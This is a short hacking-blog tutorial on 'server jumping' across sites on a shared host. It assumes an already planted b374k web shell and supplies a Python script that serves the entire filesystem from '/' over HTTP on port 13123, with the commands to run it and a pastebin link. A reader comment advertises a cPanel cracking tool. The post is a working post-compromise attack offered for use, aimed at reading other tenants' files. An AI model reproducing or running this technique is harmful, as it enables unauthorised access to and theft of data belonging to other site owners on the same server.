Server Bypass via Symlink - server Jumping

As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:

  • Python Installed on Server
  • b374k.php shell
  • And some scripts u will see below.

here we are in folder /var/www/dono and trying to go into /www/
  •  no permissions to go into /www .
    before we got tired by trying the commands u must check if if python it's installed with command :
    python -h
    Now take this python script and name it as webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .
    #!/usr/bin/env python
    # devilzc0de.org (c) 2012
    import SimpleHTTPServer
    import SocketServer
    import os
    
    port = 13123
    if __name__=='__main__':
            os.chdir('/')
            Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
    
            httpd = SocketServer.TCPServer(("", port), Handler)
    
            print("Now open this server on webbrowser at port : " + str(port))
            print("example: http://maho.com:" + str(port))
            httpd.serve_forever()
    http://pastebin.com/PddvszKC 



    Next u wil need to run the webs.py script by following command
    python webs.py 

    open the site with port 13123
    site.com:13123
Previous
Next Post »

1 মন্তব্য:

Click here for মন্তব্য
viewspk
admin
8 January 2016 at 03:46 ×

how to crack cpanel|how to crack server|how to crack symlink|how to crack shell cpanel
http://bicombusiness.blogspot.com/2016/01/cpanel-cracker.html

Congrats bro viewspk you got PERTAMAX...! hehehehe...
Reply
avatar
Thanks for your comment